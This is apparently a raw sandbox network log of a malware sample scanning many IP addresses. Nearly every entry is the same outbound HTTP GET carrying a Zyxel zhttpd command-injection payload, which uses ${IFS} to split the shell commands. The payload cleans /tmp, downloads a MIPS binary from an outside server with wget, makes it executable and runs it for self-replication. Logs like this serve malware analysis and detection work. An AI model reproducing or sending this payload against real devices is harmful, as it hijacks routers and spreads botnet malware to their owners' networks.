                                                Jan 12, 2024 18:24:40.988972902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5608192.168.2.1345116190.146.111.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989042997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5609192.168.2.134049849.47.175.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989120007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5610192.168.2.135505458.4.217.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989128113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5611192.168.2.1334238114.138.118.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989195108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5612192.168.2.135848227.100.213.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989231110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5613192.168.2.1352890149.17.20.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989304066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5614192.168.2.1341440211.48.127.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989342928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5615192.168.2.1359040207.143.13.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989406109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5616192.168.2.134821694.210.102.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989465952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5617192.168.2.133302039.36.139.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989552021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5618192.168.2.1344786101.241.200.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989581108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5619192.168.2.1344368191.52.16.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989624977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5620192.168.2.135216499.227.189.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989726067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5621192.168.2.1359170140.86.21.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989732027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5622192.168.2.1351116172.255.93.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989759922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5623192.168.2.1353350167.254.42.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989805937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5624192.168.2.1350588135.185.103.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989857912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5625192.168.2.135032270.122.224.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989905119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5626192.168.2.1339118156.187.75.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.989989996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5627192.168.2.1344440190.54.80.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990041971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5628192.168.2.13462841.64.152.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990084887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5629192.168.2.1341726108.120.81.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990143061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5630192.168.2.1346778212.131.68.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990185022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5631192.168.2.133991460.109.189.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990295887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5632192.168.2.134563491.154.108.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990334034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5633192.168.2.1349906219.36.24.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990391016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5634192.168.2.1347938218.206.14.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990482092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5635192.168.2.134485475.111.174.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990540028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5636192.168.2.135590099.169.200.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990593910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5637192.168.2.134233640.23.91.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990633965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5638192.168.2.1350512208.171.235.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990688086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5639192.168.2.1336832105.98.196.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990751982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5640192.168.2.1358416176.176.87.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990794897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5641192.168.2.133605074.61.143.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990849972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5642192.168.2.133281043.139.87.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990916967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5643192.168.2.1332970198.66.253.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990953922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5644192.168.2.1342994181.66.236.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.990987062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5645192.168.2.134971684.85.6.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991091013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5646192.168.2.134879067.168.237.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991134882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5647192.168.2.1332918164.213.148.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991202116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5648192.168.2.1342862191.234.71.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991249084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5649192.168.2.1342492182.38.224.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991326094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5650192.168.2.1356872112.198.134.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991384029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5651192.168.2.1347806109.60.249.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991415024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5652192.168.2.1339102161.180.244.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991499901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5653192.168.2.1334286109.106.104.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991554022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5654192.168.2.1353342212.135.121.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991643906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5655192.168.2.1360206162.216.96.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991676092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5656192.168.2.1355302125.81.35.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991746902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5657192.168.2.1356850141.203.126.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991799116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5658192.168.2.1340886107.226.64.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991852045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5659192.168.2.1345302192.33.174.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991900921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5660192.168.2.1359702103.205.131.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.991940975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5661192.168.2.135179812.29.58.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992000103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5662192.168.2.134297031.186.67.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992074966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5663192.168.2.135203424.185.167.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992115021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5664192.168.2.133327886.40.72.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992161036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5665192.168.2.1354520212.215.188.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992216110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5666192.168.2.1354262126.177.158.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992278099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5667192.168.2.134134866.16.148.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992336035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5668192.168.2.1339480129.191.163.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992398024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5669192.168.2.1355872175.223.75.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.992443085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5670192.168.2.1338616119.63.67.189443
                                                TimestampBytes transferredDirectionData
